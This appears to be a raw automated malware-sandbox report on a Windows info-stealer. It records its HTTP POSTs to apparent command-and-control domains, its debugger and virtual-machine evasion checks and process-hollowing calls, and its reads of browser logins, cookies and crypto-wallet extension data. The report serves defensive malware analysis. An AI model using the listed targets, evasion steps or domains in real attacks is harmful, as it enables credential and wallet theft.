              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: tacitglibbr.biz
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: tacitglibbr.biz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tacitglibbr.biz
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_004303D0 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: String function: 00D8B7C0 appears 93 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: String function: 00408040 appears 36 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: String function: 004141E0 appears 65 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: String function: 00D93EBF appears 42 times
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: String function: 00D9842D appears 40 times
              Source: X2hna87N3Y.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: X2hna87N3Y.exe | Static PE information: Section: .bss ZLIB complexity 1.000329525483304
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00435880 CoCreateInstance, SysAllocString, CoSetProxyBlanket, SysAllocString, SysAllocString, VariantInit, VariantClear, SysFreeString, SysFreeString, SysFreeString, SysFreeString, GetVolumeInformationW
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7424:120:WilError_03
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: X2hna87N3Y.exe, 00000002.00000003.1791149801.0000000003864000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1815890661.0000000003832000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: X2hna87N3Y.exe | Virustotal: Detection: 52%
              Source: X2hna87N3Y.exe | ReversingLabs: Detection: 50%
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File read: C:\Users\user\Desktop\X2hna87N3Y.exe
              Source: unknown | Process created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Process created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Section loaded: version.dll
              Source: X2hna87N3Y.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
              Source: X2hna87N3Y.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: X2hna87N3Y.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: X2hna87N3Y.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: X2hna87N3Y.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: X2hna87N3Y.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: X2hna87N3Y.exe | Static PE information: section name: .CODE
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D8B97A push ecx; ret (at 0_2_00D8B98D)
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00438960 push eax; mov dword ptr [esp], 04050607h (at 2_2_0043896E)
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_0043B4A0 push eax; mov dword ptr [esp], 929190CFh (at 2_2_0043B4A1)
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00D8B97A push ecx; ret (at 2_2_00D8B98D)
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | API coverage: 9.7 %
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe TID: 7552 | Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe TID: 7552 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D9D358 FindFirstFileExW,FindNextFileW,FindClose,FindClose | 0_2_00D9D358
              Source: X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967856629.0000000000F87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWS
              Source: X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967856629.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967608175.0000000000F4C000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1968844301.0000000000F4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00439DF0 LdrInitializeThunk | 2_2_00439DF0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D93C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00D93C11
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00DB21A9 mov edi, dword ptr fs:[00000030h] | 0_2_00DB21A9
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00DB55D0 mov edi, dword ptr fs:[00000030h] | 0_2_00DB55D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00DB55D0 mov edi, dword ptr fs:[00000030h] | 2_2_00DB55D0
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D98D25 GetProcessHeap | 0_2_00D98D25
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D8B290 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00D8B290
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D93C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00D93C11
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D8B64C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00D8B64C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D8B640 SetUnhandledExceptionFilter | 0_2_00D8B640
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00D8B290 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_00D8B290
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00D93C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_00D93C11
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00D8B64C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_00D8B64C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 2_2_00D8B640 SetUnhandledExceptionFilter | 2_2_00D8B640

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00DB21A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread | 0_2_00DB21A9
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Memory written: C:\Users\user\Desktop\X2hna87N3Y.exe base: 400000 value starts with: 4D5A
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: debonairnukk.xyz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: diffuculttan.xyz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: effecterectz.xyz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: deafeninggeh.biz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: immureprech.biz
              Source: X2hna87N3Y.exe, 00000000.00000002.1739887798.0000000002B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: tacitglibbr.biz
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Process created: C:\Users\user\Desktop\X2hna87N3Y.exe "C:\Users\user\Desktop\X2hna87N3Y.exe"
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 0_2_00D9C8FD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 0_2_00D9806C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 0_2_00D9C862
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 0_2_00D9CBAF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 0_2_00D9CB50
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 0_2_00D9CCCF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 0_2_00D9CC84
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 0_2_00D9CD76
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 0_2_00D9CE7C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 0_2_00D9C611
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 0_2_00D98610
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 2_2_00D9C8FD
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 2_2_00D9806C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 2_2_00D9C862
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 2_2_00D9CBAF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 2_2_00D9CB50
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 2_2_00D9CCCF
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 2_2_00D9CC84
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 2_2_00D9CD76
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetLocaleInfoW | 2_2_00D9CE7C
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 2_2_00D9C611
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: EnumSystemLocalesW | 2_2_00D98610
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Code function: 0_2_00D8C367 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 0_2_00D8C367
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: X2hna87N3Y.exe, 00000002.00000003.1909555622.0000000003847000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: Process Memory Space: X2hna87N3Y.exe PID: 7536, type: MEMORYSTR
              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\\Electrum\\wallets","m
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %\\ElectronCash\
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: },{"t":0,"p":"%appdata%\\com.liberty.jaxx\\Index
              Source: X2hna87N3Y.exe, 00000002.00000003.1865922342.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
              Source: X2hna87N3Y.exe, 00000002.00000003.1865922342.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: X2hna87N3Y.exe, 00000002.00000003.1837573054.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ["keystore"],"z":"Wallets/Etherezn
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
